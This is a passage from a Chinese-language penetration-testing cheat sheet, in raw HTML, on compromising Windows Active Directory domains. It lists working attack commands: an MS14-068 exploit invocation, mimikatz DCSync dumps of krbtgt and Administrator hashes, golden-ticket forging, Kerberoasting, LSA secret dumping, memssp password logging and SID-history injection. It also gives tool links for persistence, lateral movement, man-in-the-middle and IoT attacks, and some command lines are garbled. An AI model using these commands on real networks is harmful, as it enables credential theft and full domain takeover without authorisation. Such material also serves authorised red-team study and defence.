Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
</code></pre><p>BloodHound
&#x200B;            </p>
<h3 id="&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;"><a name="&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;" class="anchor-navigation-ex-anchor" href="#&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;</h3>
<h4 id="sysvol"><a name="sysvol" class="anchor-navigation-ex-anchor" href="#sysvol"><i class="fa fa-link" aria-hidden="true"></i></a>SYSVOL</h4>
<p>SYSVOL&#x662F;&#x6307;&#x5B58;&#x50A8;&#x57DF;&#x516C;&#x5171;&#x6587;&#x4EF6;&#x670D;&#x52A1;&#x5668;&#x526F;&#x672C;&#x7684;&#x5171;&#x4EAB;&#x6587;&#x4EF6;&#x5939;&#xFF0C;&#x5B83;&#x4EEC;&#x5728;&#x57DF;&#x4E2D;&#x6240;&#x6709;&#x7684;&#x57DF;&#x63A7;&#x5236;&#x5668;&#x4E4B;&#x95F4;&#x590D;&#x5236;&#x3002; Sysvol&#x6587;&#x4EF6;&#x5939;&#x662F;&#x5B89;&#x88C5;AD&#x65F6;&#x521B;&#x5EFA;&#x7684;&#xFF0C;&#x5B83;&#x7528;&#x6765;&#x5B58;&#x653E;GPO&#x3001;Script&#x7B49;&#x4FE1;&#x606F;&#x3002;&#x540C;&#x65F6;&#xFF0C;&#x5B58;&#x653E;&#x5728;Sysvol&#x6587;&#x4EF6;&#x5939;&#x4E2D;&#x7684;&#x4FE1;&#x606F;&#xFF0C;&#x4F1A;&#x590D;&#x5236;&#x5230;&#x57DF;&#x4E2D;&#x6240;&#x6709;DC&#x4E0A;&#x3002; 
&#x76F8;&#x5173;&#x9605;&#x8BFB;: </p>
<ul>
<li><a href="http://www.freebuf.com/vuls/92016.html" target="_blank">&#x5BFB;&#x627E;SYSVOL&#x91CC;&#x7684;&#x5BC6;&#x7801;&#x548C;&#x653B;&#x51FB;GPP&#xFF08;&#x7EC4;&#x7B56;&#x7565;&#x504F;&#x597D;&#xFF09; </a></li>
<li><a href="http://blog.51cto.com/ycrsjxy/203095" target="_blank">Windows Server 2008 R2&#x4E4B;&#x56DB;&#x7BA1;&#x7406;Sysvol&#x6587;&#x4EF6;&#x5939; </a></li>
<li><a href="https://adsecurity.org/?p=2288" target="_blank">SYSVOL&#x4E2D;&#x67E5;&#x627E;&#x5BC6;&#x7801;&#x5E76;&#x5229;&#x7528;&#x7EC4;&#x7B56;&#x7565;&#x9996;&#x9009;&#x9879; </a></li>
<li><a href="https://xz.aliyun.com/t/1653" target="_blank">&#x5229;&#x7528;SYSVOL&#x8FD8;&#x539F;&#x7EC4;&#x7B56;&#x7565;&#x4E2D;&#x4FDD;&#x5B58;&#x7684;&#x5BC6;&#x7801;</a> </li>
</ul>
<h4 id="ms14-068-kerberos"><a name="ms14-068-kerberos" class="anchor-navigation-ex-anchor" href="#ms14-068-kerberos"><i class="fa fa-link" aria-hidden="true"></i></a>MS14-068 Kerberos</h4>
<pre class="language-"><code>python ms14-068.py -u &#x57DF;&#x7528;&#x6237;@&#x57DF;&#x540D; -p &#x5BC6;&#x7801; -s &#x7528;&#x6237;SID -d &#x57DF;&#x4E3B;&#x673A;
</code></pre><p>&#x5229;&#x7528;mimikatz&#x5C06;&#x5DE5;&#x5177;&#x5F97;&#x5230;&#x7684;TGT_domainuser@SERVER.COM.ccache&#x5199;&#x5165;&#x5185;&#x5B58;&#xFF0C;&#x521B;&#x5EFA;&#x7F13;&#x5B58;&#x8BC1;&#x4E66;&#xFF1A;</p>
<pre class="language-"><code>mimikatz.exe &quot;kerberos::ptc c:TGT_darthsidious@pentest.com.ccache&quot; exit
net use k: \pentest.comc$
</code></pre><p>&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="http://adsecurity.org/?p=676" target="_blank">Kerberos&#x7684;&#x5DE5;&#x5177;&#x5305;PyKEK</a> </li>
<li><a href="http://www.freebuf.com/vuls/56081.html" target="_blank">&#x6DF1;&#x5165;&#x89E3;&#x8BFB;MS14-068&#x6F0F;&#x6D1E;</a> </li>
<li><a href="https://adsecurity.org/?p=541" target="_blank">Kerberos&#x7684;&#x5B89;&#x5168;&#x6F0F;&#x6D1E;</a> </li>
</ul>
<h4 id="spn&#x626B;&#x63CF;"><a name="spn&#x626B;&#x63CF;" class="anchor-navigation-ex-anchor" href="#spn&#x626B;&#x63CF;"><i class="fa fa-link" aria-hidden="true"></i></a>SPN&#x626B;&#x63CF;</h4>
<p>Kerberoast&#x53EF;&#x4EE5;&#x4F5C;&#x4E3A;&#x4E00;&#x4E2A;&#x6709;&#x6548;&#x7684;&#x65B9;&#x6CD5;&#x4ECE;Active Directory&#x4E2D;&#x4EE5;&#x666E;&#x901A;&#x7528;&#x6237;&#x7684;&#x8EAB;&#x4EFD;&#x63D0;&#x53D6;&#x670D;&#x52A1;&#x5E10;&#x6237;&#x51ED;&#x636E;&#xFF0C;&#x65E0;&#x9700;&#x5411;&#x76EE;&#x6807;&#x7CFB;&#x7EDF;&#x53D1;&#x9001;&#x4EFB;&#x4F55;&#x6570;&#x636E;&#x5305;&#x3002;
SPN&#x662F;&#x670D;&#x52A1;&#x5728;&#x4F7F;&#x7528;Kerberos&#x8EAB;&#x4EFD;&#x9A8C;&#x8BC1;&#x7684;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;&#x552F;&#x4E00;&#x6807;&#x8BC6;&#x7B26;&#x3002;&#x5B83;&#x7531;&#x670D;&#x52A1;&#x7C7B;&#xFF0C;&#x4E3B;&#x673A;&#x540D;&#x548C;&#x7AEF;&#x53E3;&#x7EC4;&#x6210;&#x3002;&#x5728;&#x4F7F;&#x7528;Kerberos&#x8EAB;&#x4EFD;&#x9A8C;&#x8BC1;&#x7684;&#x7F51;&#x7EDC;&#x4E2D;&#xFF0C;&#x5FC5;&#x987B;&#x5728;&#x5185;&#x7F6E;&#x8BA1;&#x7B97;&#x673A;&#x5E10;&#x6237;&#xFF08;&#x5982;NetworkService&#x6216;LocalSystem&#xFF09;&#x6216;&#x7528;&#x6237;&#x5E10;&#x6237;&#x4E0B;&#x4E3A;&#x670D;&#x52A1;&#x5668;&#x6CE8;&#x518C;SPN&#x3002;&#x5BF9;&#x4E8E;&#x5185;&#x90E8;&#x5E10;&#x6237;&#xFF0C;SPN&#x5C06;&#x81EA;&#x52A8;&#x8FDB;&#x884C;&#x6CE8;&#x518C;&#x3002;&#x4F46;&#x662F;&#xFF0C;&#x5982;&#x679C;&#x5728;&#x57DF;&#x7528;&#x6237;&#x5E10;&#x6237;&#x4E0B;&#x8FD0;&#x884C;&#x670D;&#x52A1;&#xFF0C;&#x5219;&#x5FC5;&#x987B;&#x4E3A;&#x8981;&#x4F7F;&#x7528;&#x7684;&#x5E10;&#x6237;&#x7684;&#x624B;&#x52A8;&#x6CE8;&#x518C;SPN&#x3002;
SPN&#x626B;&#x63CF;&#x7684;&#x4E3B;&#x8981;&#x597D;&#x5904;&#x662F;&#xFF0C;SPN&#x626B;&#x63CF;&#x4E0D;&#x9700;&#x8981;&#x8FDE;&#x63A5;&#x5230;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;&#x6BCF;&#x4E2A;IP&#x6765;&#x68C0;&#x67E5;&#x670D;&#x52A1;&#x7AEF;&#x53E3;&#xFF0C;SPN&#x901A;&#x8FC7;LDAP&#x67E5;&#x8BE2;&#x5411;&#x57DF;&#x63A7;&#x6267;&#x884C;&#x670D;&#x52A1;&#x53D1;&#x73B0;&#xFF0C;SPN&#x67E5;&#x8BE2;&#x662F;Kerberos&#x7684;&#x7968;&#x636E;&#x884C;&#x4E3A;&#x4E00;&#x90E8;&#x5206;&#xFF0C;&#x56E0;&#x6B64;&#x6BD4;&#x8F83;&#x96BE;&#x68C0;&#x6D4B;SPN&#x626B;&#x63CF;&#x3002;
&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/" target="_blank">&#x975E;&#x626B;&#x63CF;&#x5F0F;&#x7684;SQL Server&#x53D1;&#x73B0;</a> </li>
<li><a href="https://adsecurity.org/?p=1508" target="_blank">SPN&#x626B;&#x63CF;</a> </li>
<li><a href="https://github.com/PyroTek3/PowerShell-AD-Recon" target="_blank">&#x626B;&#x63CF;SQLServer&#x7684;&#x811A;&#x672C;</a> </li>
</ul>
<h4 id="kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;"><a name="kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;" class="anchor-navigation-ex-anchor" href="#kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;"><i class="fa fa-link" aria-hidden="true"></i></a>Kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;</h4>
<p>&#x5728;&#x57DF;&#x4E0A;&#x6293;&#x53D6;&#x7684;&#x54C8;&#x5E0C;</p>
<pre class="language-"><code>lsadump::dcsync /domain:pentest.com /user:krbtgt
</code></pre><pre class="language-"><code>kerberos::purge
kerberos::golden /admin:administrator /domain:&#x57DF; /sid:SID /krbtgt:hash&#x503C; /ticket:adinistrator.kiribi
kerberos::ptt administrator.kiribi
kerberos::tgt
net use k: \pnet use k: \pentest.comc$
</code></pre><p>&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="https://adsecurity.org/?p=1640" target="_blank">https://adsecurity.org/?p=1640</a> </li>
<li><a href="http://bobao.360.cn/learning/detail/3564.html" target="_blank">&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;&#x5B9E;&#x8DF5;</a> </li>
<li><a href="https://blog.csdn.net/wulantian/article/details/42418231" target="_blank">Kerberos&#x7684;&#x8BA4;&#x8BC1;&#x539F;&#x7406;</a> </li>
<li><a href="https://klionsec.github.io/2016/08/10/ntlm-kerberos/" target="_blank">&#x6DF1;&#x523B;&#x7406;&#x89E3;windows&#x5B89;&#x5168;&#x8BA4;&#x8BC1;&#x673A;&#x5236;ntlm&#xFF06;Kerberos</a> </li>
</ul>
<h4 id="kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;"><a name="kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;" class="anchor-navigation-ex-anchor" href="#kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;"><i class="fa fa-link" aria-hidden="true"></i></a>Kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;</h4>
<p>&#x9EC4;&#x91D1;&#x7968;&#x636E;&#x548C;&#x767D;&#x94F6;&#x7968;&#x636E;&#x7684;&#x4E00;&#x4E9B;&#x533A;&#x522B;&#xFF1A;
Golden Ticket&#xFF1A;&#x4F2A;&#x9020;<code>TGT</code>&#xFF0C;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;<code>&#x4EFB;&#x4F55;Kerberos</code>&#x670D;&#x52A1;&#x6743;&#x9650;
&#x94F6;&#x7968;&#xFF1A;&#x4F2A;&#x9020;TGS&#xFF0C;<code>&#x53EA;&#x80FD;&#x8BBF;&#x95EE;&#x6307;&#x5B9A;&#x7684;&#x670D;&#x52A1;</code>
&#x52A0;&#x5BC6;&#x65B9;&#x5F0F;&#x4E0D;&#x540C;&#xFF1A;
Golden Ticket&#x7531;<code>krbtgt</code>&#x7684;hash&#x52A0;&#x5BC6;
Silver Ticket&#x7531;<code>&#x670D;&#x52A1;&#x8D26;&#x53F7;</code>&#xFF08;&#x901A;&#x5E38;&#x4E3A;&#x8BA1;&#x7B97;&#x673A;&#x8D26;&#x6237;&#xFF09;Hash&#x52A0;&#x5BC6;
&#x8BA4;&#x8BC1;&#x6D41;&#x7A0B;&#x4E0D;&#x540C;&#xFF1A;
&#x91D1;&#x7968;&#x5728;&#x4F7F;&#x7528;&#x7684;&#x8FC7;&#x7A0B;&#x9700;&#x8981;&#x540C;&#x57DF;&#x63A7;&#x901A;&#x4FE1;
&#x94F6;&#x7968;&#x5728;&#x4F7F;&#x7528;&#x7684;&#x8FC7;&#x7A0B;&#x4E0D;&#x9700;&#x8981;&#x540C;&#x57DF;&#x63A7;&#x901A;&#x4FE1;
&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="https://adsecurity.org/?p=2011" target="_blank">&#x653B;&#x51FB;&#x8005;&#x5982;&#x4F55;&#x4F7F;&#x7528;Kerberos&#x7684;&#x94F6;&#x7968;&#x6765;&#x5229;&#x7528;&#x7CFB;&#x7EDF;</a> </li>
<li><a href="https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf" target="_blank">&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Pass The Ticket</a></li>
</ul>
<h4 id="&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;"><a name="&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;" class="anchor-navigation-ex-anchor" href="#&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;</h4>
<p>&#x4E0E;&#x4E0A;&#x9762;SPN&#x626B;&#x63CF;&#x7C7B;&#x4F3C;&#x7684;&#x539F;&#x7406;
<a href="https://github.com/nidem/kerberoast" target="_blank">https://github.com/nidem/kerberoast</a>
&#x83B7;&#x53D6;&#x6240;&#x6709;&#x7528;&#x4F5C;SPN&#x7684;&#x5E10;&#x6237;</p>
<pre class="language-"><code>setspn -T PENTEST.com -Q */*
</code></pre><p>&#x4ECE;Mimikatz&#x7684;RAM&#x4E2D;&#x63D0;&#x53D6;&#x83B7;&#x5F97;&#x7684;&#x95E8;&#x7968;</p>
<pre class="language-"><code>kerberos::list /export
</code></pre><p>&#x7528;rgsrepcrack&#x7834;&#x89E3;</p>
<pre class="language-"><code>tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
</code></pre><h4 id="&#x51ED;&#x8BC1;&#x76D7;&#x7A83;"><a name="&#x51ED;&#x8BC1;&#x76D7;&#x7A83;" class="anchor-navigation-ex-anchor" href="#&#x51ED;&#x8BC1;&#x76D7;&#x7A83;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x51ED;&#x8BC1;&#x76D7;&#x7A83;</h4>
<p>&#x4ECE;&#x641C;&#x96C6;&#x7684;&#x5BC6;&#x7801;&#x91CC;&#x9762;&#x627E;&#x7BA1;&#x7406;&#x5458;&#x7684;&#x5BC6;&#x7801; </p>
<h4 id="&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;"><a name="&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;" class="anchor-navigation-ex-anchor" href="#&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;</h4>
<p>&#x5B9E;&#x5728;&#x641E;&#x4E0D;&#x5B9A;&#x518D;&#x641E;ARP 
&#x200B;    </p>
<h3 id="&#x83B7;&#x53D6;ad&#x54C8;&#x5E0C;"><a name="&#x83B7;&#x53D6;ad&#x54C8;&#x5E0C;" class="anchor-navigation-ex-anchor" href="#&#x83B7;&#x53D6;ad&#x54C8;&#x5E0C;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x83B7;&#x53D6;AD&#x54C8;&#x5E0C;</h3>
<ul>
<li>&#x4F7F;&#x7528;VSS&#x5377;&#x5F71;&#x526F;&#x672C; </li>
<li>Ntdsutil&#x4E2D;&#x83B7;&#x53D6;NTDS.DIT&#x200B;&#x200B;&#x6587;&#x4EF6; </li>
<li>PowerShell&#x4E2D;&#x63D0;&#x53D6;NTDS.DIT --&gt;<a href="https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy" target="_blank">Invoke-NinaCopy </a></li>
<li>&#x4F7F;&#x7528;Mimikatz&#x63D0;&#x53D6; </li>
</ul>
<pre class="language-"><code>mimikatz lsadump::lsa /inject exit
</code></pre><ul>
<li>&#x4F7F;&#x7528;PowerShell Mimikatz</li>
<li>&#x4F7F;&#x7528;Mimikatz&#x7684;DCSync &#x8FDC;&#x7A0B;&#x8F6C;&#x50A8;Active Directory&#x51ED;&#x8BC1;
&#x63D0;&#x53D6; KRBTGT&#x7528;&#x6237;&#x5E10;&#x6237;&#x7684;&#x5BC6;&#x7801;&#x6570;&#x636E;&#xFF1A;</li>
</ul>
<pre class="language-"><code>Mimikatz &quot;privilege::debug&quot; &quot;lsadump::dcsync /domain:rd.adsecurity.org /user&#xFF1A;krbtgt&quot;exit
</code></pre><p>&#x7BA1;&#x7406;&#x5458;&#x7528;&#x6237;&#x5E10;&#x6237;&#x63D0;&#x53D6;&#x5BC6;&#x7801;&#x6570;&#x636E;&#xFF1A;</p>
<pre class="language-"><code>Mimikatz &quot;privilege::debug&quot; &quot;lsadump::dcsync /domain:rd.adsecurity.org /user&#xFF1A;Administrator&quot; exit
</code></pre><ul>
<li>NTDS.dit&#x4E2D;&#x63D0;&#x53D6;&#x54C8;&#x5E0C; 
&#x4F7F;&#x7528;esedbexport&#x6062;&#x590D;&#x4EE5;&#x540E;&#x4F7F;&#x7528;ntdsxtract&#x63D0;&#x53D6; </li>
</ul>
<h3 id="ad&#x6301;&#x4E45;&#x5316;"><a name="ad&#x6301;&#x4E45;&#x5316;" class="anchor-navigation-ex-anchor" href="#ad&#x6301;&#x4E45;&#x5316;"><i class="fa fa-link" aria-hidden="true"></i></a>AD&#x6301;&#x4E45;&#x5316;</h3>
<h4 id="&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;"><a name="&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;" class="anchor-navigation-ex-anchor" href="#&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;</h4>
<p><a href="https://adsecurity.org/?p=1929" target="_blank">https://adsecurity.org/?p=1929</a> 
DS&#x6062;&#x590D;&#x6A21;&#x5F0F;&#x5BC6;&#x7801;&#x7EF4;&#x62A4; 
DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65; </p>
<blockquote>
<p>Windows Server 2008 &#x9700;&#x8981;&#x5B89;&#x88C5;KB961320&#x8865;&#x4E01;&#x624D;&#x652F;&#x6301;DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65;&#xFF0C;Windows Server 2003&#x4E0D;&#x652F;&#x6301;DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65;&#x3002;KB961320:<a href="https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,&#x53EF;&#x53C2;&#x8003;&#xFF1A;[&#x5DE7;&#x7528;DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65;&#x5C06;&#x57DF;&#x63A7;&#x6743;&#x9650;&#x6301;&#x4E45;&#x5316;](http://drops.xmd5.com/static/drops/tips-9297.html" target="_blank">https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,&#x53EF;&#x53C2;&#x8003;&#xFF1A;[&#x5DE7;&#x7528;DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65;&#x5C06;&#x57DF;&#x63A7;&#x6743;&#x9650;&#x6301;&#x4E45;&#x5316;](http://drops.xmd5.com/static/drops/tips-9297.html</a>)</p>
</blockquote>
<p><a href="https://www.dcshadow.com/" target="_blank">DCshadow </a></p>
<h4 id="security-support-provider"><a name="security-support-provider" class="anchor-navigation-ex-anchor" href="#security-support-provider"><i class="fa fa-link" aria-hidden="true"></i></a>Security Support Provider</h4>
<p>&#x7B80;&#x5355;&#x7684;&#x7406;&#x89E3;&#x4E3A;SSP&#x5C31;&#x662F;&#x4E00;&#x4E2A;DLL&#xFF0C;&#x7528;&#x6765;&#x5B9E;&#x73B0;&#x8EAB;&#x4EFD;&#x8BA4;&#x8BC1;</p>
<pre class="language-"><code>privilege::debug
misc::memssp
</code></pre><p>&#x8FD9;&#x6837;&#x5C31;&#x4E0D;&#x9700;&#x8981;&#x91CD;&#x542F;<code>c:/windows/system32</code>&#x53EF;&#x770B;&#x5230;&#x65B0;&#x751F;&#x6210;&#x7684;&#x6587;&#x4EF6;kiwissp.log</p>
<h4 id="sid-history"><a name="sid-history" class="anchor-navigation-ex-anchor" href="#sid-history"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://adsecurity.org/?p=1772" target="_blank">SID History</a></h4>
<p>SID&#x5386;&#x53F2;&#x8BB0;&#x5F55;&#x5141;&#x8BB8;&#x53E6;&#x4E00;&#x4E2A;&#x5E10;&#x6237;&#x7684;&#x8BBF;&#x95EE;&#x88AB;&#x6709;&#x6548;&#x5730;&#x514B;&#x9686;&#x5230;&#x53E6;&#x4E00;&#x4E2A;&#x5E10;&#x6237;</p>
<pre class="language-"><code>mimikatz &quot;privilege::debug&quot; &quot;misc::addsid bobafett ADSAdministrator&quot;
</code></pre><h4 id="adminsdholder&#xFF06;sdprop-"><a name="adminsdholder&#xFF06;sdprop-" class="anchor-navigation-ex-anchor" href="#adminsdholder&#xFF06;sdprop-"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://adsecurity.org/?p=1906" target="_blank">AdminSDHolder&#xFF06;SDProp </a></h4>
<p>&#x5229;&#x7528;AdminSDHolder&#xFF06;SDProp&#xFF08;&#x91CD;&#x65B0;&#xFF09;&#x83B7;&#x53D6;&#x57DF;&#x7BA1;&#x7406;&#x6743;&#x9650; </p>
<h4 id="&#x7EC4;&#x7B56;&#x7565;"><a name="&#x7EC4;&#x7B56;&#x7565;" class="anchor-navigation-ex-anchor" href="#&#x7EC4;&#x7B56;&#x7565;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7EC4;&#x7B56;&#x7565;</h4>
<p><a href="https://adsecurity.org/?p=2716" target="_blank">https://adsecurity.org/?p=2716</a> 
<a href="https://www.anquanke.com/post/id/86531" target="_blank">&#x7B56;&#x7565;&#x5BF9;&#x8C61;&#x5728;&#x6301;&#x4E45;&#x5316;&#x53CA;&#x6A2A;&#x5411;&#x6E17;&#x900F;&#x4E2D;&#x7684;&#x5E94;&#x7528;</a> </p>
<h4 id="hook-passwordchangenotify"><a name="hook-passwordchangenotify" class="anchor-navigation-ex-anchor" href="#hook-passwordchangenotify"><i class="fa fa-link" aria-hidden="true"></i></a>Hook PasswordChangeNotify</h4>
<p><a href="http://wooyun.jozxing.cc/static/drops/tips-13079.html" target="_blank">http://wooyun.jozxing.cc/static/drops/tips-13079.html</a> </p>
<h3 id="tips"><a name="tips" class="anchor-navigation-ex-anchor" href="#tips"><i class="fa fa-link" aria-hidden="true"></i></a>TIPS</h3>
<p><a href="https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Dump Clear-Text Password after KB2871997 installed&#x300B;</a> 
<a href="http://www.vuln.cn/6812" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Hook PasswordChangeNotify&#x300B;</a> </p>
<blockquote>
<p>&#x53EF;&#x901A;&#x8FC7;Hook PasswordChangeNotify&#x5B9E;&#x65F6;&#x8BB0;&#x5F55;&#x57DF;&#x63A7;&#x7BA1;&#x7406;&#x5458;&#x7684;&#x65B0;&#x5BC6;&#x7801; </p>
</blockquote>
<p><a href="http://www.liuhaihua.cn/archives/179102.html" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Local Administrator Password Solution&#x300B; </a></p>
<blockquote>
<p>&#x57DF;&#x6E17;&#x900F;&#x65F6;&#x8981;&#x8BB0;&#x5F97;&#x7559;&#x610F;&#x57DF;&#x5185;&#x4E3B;&#x673A;&#x7684;&#x672C;&#x5730;&#x7BA1;&#x7406;&#x5458;&#x8D26;&#x53F7; </p>
</blockquote>
<p><a href="https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/" target="_blank">&#x300A;&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;&#x5229;&#x7528;SYSVOL&#x8FD8;&#x539F;&#x7EC4;&#x7B56;&#x7565;&#x4E2D;&#x4FDD;&#x5B58;&#x7684;&#x5BC6;&#x7801;&#x300B; </a></p>
<h3 id="&#x76F8;&#x5173;&#x5DE5;&#x5177;"><a name="&#x76F8;&#x5173;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#&#x76F8;&#x5173;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x76F8;&#x5173;&#x5DE5;&#x5177;</h3>
<p><a href="https://github.com/BloodHoundAD/BloodHound" target="_blank">BloodHound </a>
<a href="https://github.com/byt3bl33d3r/CrackMapExec" target="_blank">CrackMapExec </a>
<a href="https://github.com/byt3bl33d3r/DeathStar" target="_blank">DeathStar</a> </p>
<blockquote>
<p>&#x5229;&#x7528;&#x8FC7;&#x7A0B;&#xFF1A;<a href="http://www.freebuf.com/sectool/160884.html" target="_blank">http://www.freebuf.com/sectool/160884.html</a> </p>
</blockquote>
<h2 id="&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;"><a name="&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;" class="anchor-navigation-ex-anchor" href="#&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5728;&#x8FDC;&#x7A0B;&#x7CFB;&#x7EDF;&#x4E0A;&#x6267;&#x884C;&#x7A0B;&#x5E8F;</h2>
<ul>
<li>At </li>
<li>Psexec </li>
<li>WMIC </li>
<li>Wmiexec </li>
<li>Smbexec </li>
<li>Powershell remoting </li>
<li>DCOM </li>
</ul>
<h2 id="iot&#x76F8;&#x5173;"><a name="iot&#x76F8;&#x5173;" class="anchor-navigation-ex-anchor" href="#iot&#x76F8;&#x5173;"><i class="fa fa-link" aria-hidden="true"></i></a>IOT&#x76F8;&#x5173;</h2>
<ul>
<li>1&#x3001;&#x8DEF;&#x7531;&#x5668; <a href="https://github.com/reverse-shell/routersploit" target="_blank">routersploit </a></li>
<li>2&#x3001;&#x6253;&#x5370;&#x673A; <a href="https://github.com/RUB-NDS/PRET" target="_blank">PRET </a></li>
<li>3&#x3001;IOT exp <a href="https://www.exploitee.rs/" target="_blank">https://www.exploitee.rs/</a></li>
<li>4&#x3001;&#x76F8;&#x5173; 
<a href="https://www.owasp.org/index.php/OWASP_Nettacker" target="_blank">OWASP-Nettacker</a>
<a href="https://github.com/dark-lbp/isf" target="_blank">isf</a> 
<a href="https://github.com/w3h/icsmaster" target="_blank">icsmaster</a></li>
</ul>
<h2 id="&#x4E2D;&#x95F4;&#x4EBA;"><a name="&#x4E2D;&#x95F4;&#x4EBA;" class="anchor-navigation-ex-anchor" href="#&#x4E2D;&#x95F4;&#x4EBA;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4E2D;&#x95F4;&#x4EBA;</h2>
<ul>
<li><a href="http://www.oxid.it/cain.html" target="_blank">Cain</a> </li>
<li><a href="https://github.com/Ettercap/ettercap" target="_blank">Ettercap</a> </li>
<li><a href="https://github.com/SpiderLabs/Responder" target="_blank">Responder</a> </li>
<li><a href="https://github.com/byt3bl33d3r/MITMf" target="_blank">MITMf</a> </li>
<li><a href="https://github.com/evilsocket/bettercap" target="_blank">3r/MITMf)</a> </li>
</ul>
<h2 id="&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;"><a name="&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;" class="anchor-navigation-ex-anchor" href="#&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x89C4;&#x907F;&#x6740;&#x8F6F;&#x53CA;&#x68C0;&#x6D4B;</h2>
